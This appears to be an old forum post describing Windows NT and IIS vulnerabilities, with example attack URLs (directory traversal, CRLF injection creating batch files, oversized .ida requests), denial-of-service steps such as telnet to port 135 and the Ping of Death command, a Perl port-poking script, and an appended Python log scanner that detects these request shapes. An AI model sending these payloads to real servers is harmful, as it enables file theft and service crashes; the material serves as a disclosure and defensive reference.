NT vulnerabilities and their descriptions (in English)

Posted on 2011-1-13 17:12:25
Affected systems: 4.0, IIS 1.0

A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.

A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

--------------------------------------------------------------------

Affected systems: 4.0

A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'.

If the file 'target.bat' exists, the file will be truncated.

A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat'.

----------------------------------------------------------------------

Affected systems: 3.51, 4.0

Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'.

The following steps:

Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet

results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

When launched against port 135, NT Task Manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.

The above also works on port 1031 (inetinfo.exe), where the IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

The following is a modified Perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your own system (Perl is available from the NT Resource Kit):

/*begin poke code*/

use Socket;
use FileHandle;
require "chat2.pl";   # old Perl chat library shipped with the NT Resource Kit Perl

# hostname of the system to test, taken from the command line
$systemname = shift or die "usage: perl poke servername\n";

$verbose    = 1;   # tell me what you're hitting
$knownports = 1;   # don't hit known problem ports

for ($port = 1; $port < 65535; $port++)
{
    # skip the ports described above as vulnerable to 'confusion'
    if ($knownports && ($port == 53 || $port == 135 || $port == 1031)) {
        next;
    }
    $fh = chat::open_port($systemname, $port);
    next unless defined $fh;   # nothing listening on this port
    chat::print($fh, "This is about ten characters or more");
    if ($verbose) {
        print "Trying port: $port\n";
    }
    chat::close($fh);
}

/*end poke code*/

Save the above text as c:\perl\bin\poke and run it like this: C:\perl\bin> perl poke servername

--------------------------------------------------------------------------------

Affected systems: 4.0

Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.

This attack causes Dr. Watson to display an alert window and to log an error:

"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"

--------------------------------------------------------------------------------

Affected systems: 3.51, 4.0

Large packet pings (PING -l 65527 -s 1 hostname), otherwise known as the 'Ping of Death', can cause a blue screen of death on 3.51 systems:

STOP: 0X0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vulnerable when sending large packets, but does not crash on receiving large packets.

--------------------------------------------------------------------------------

Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have two kinds of results. One possible outcome is that the server responds with a message like "URL String too long", "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL http://www.example.com/...[25kb of '.']...ida the server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).

--------------------------------------------------------

IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as http://www.microsoft.com/anything.ida or http://www.microsoft.com/anything.idq, a remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found'. Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server.
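As an added defender's-side example (not part of the original post), the following Python flags the request shapes described above in IIS-style log lines: '..\..' traversal, '>' output redirection in script URLs, CR/LF in a script name, .ida/.idq probes and the long run of dots before 'ida'. The log lines, field layout and rule names are constructed assumptions for illustration.

```python
"""Flag the IIS request shapes described in the post in W3C-style log lines.
Rules run on a percent-decoded, slash-normalized copy of the request URI."""
import re
from urllib.parse import unquote

# Constructed sample lines (date time client method uri status); not real traffic.
SAMPLE_LOG = [
    "2011-01-13 17:12:25 10.0.0.5 GET /default.htm 200",
    r"2011-01-13 17:12:26 10.0.0.9 GET /..\..\readme.txt 200",
    "2011-01-13 17:12:27 10.0.0.9 GET /scripts/..%5c..%5cscripts/test.bat 200",
    r"2011-01-13 17:12:28 10.0.0.9 GET /scripts/exploit.bat>PATH\target.bat 502",
    "2011-01-13 17:12:29 10.0.0.9 GET /scripts/script_name%0A%0D>target.bat 502",
    "2011-01-13 17:12:30 10.0.0.9 GET /anything.idq 404",
    "2011-01-13 17:12:31 10.0.0.9 GET /" + "." * 300 + "ida 500",
]

def normalize(uri):
    """Percent-decode twice (catches %255c double encoding) and fold '\\' to '/'."""
    for _ in range(2):
        uri = unquote(uri)
    return uri.replace("\\", "/")

# Each rule is evaluated on the normalized path; the names are detection labels.
RULES = [
    ("traversal",        lambda u: "/../" in u or u.endswith("/..")),
    ("redirect-to-file", lambda u: ">" in u),
    ("crlf-in-path",     lambda u: "\r" in u or "\n" in u),
    ("idq-ida-probe",    lambda u: u.lower().endswith((".ida", ".idq"))),
    ("long-dot-run",     lambda u: re.search(r"\.{200,}", u) is not None),
]

def classify(uri):
    """Return the names of all rules that match a raw request URI."""
    u = normalize(uri)
    return [name for name, test in RULES if test(u)]

def scan_log(lines):
    """Return (line_no, uri, hits) for each log line that triggers a rule."""
    findings = []
    for n, line in enumerate(lines, 1):
        fields = line.split()
        if len(fields) < 5:        # malformed line: skip rather than crash
            continue
        hits = classify(fields[4])
        if hits:
            findings.append((n, fields[4], hits))
    return findings
```

Running `scan_log(SAMPLE_LOG)` flags lines 2 through 7; the clean request on line 1 produces no finding.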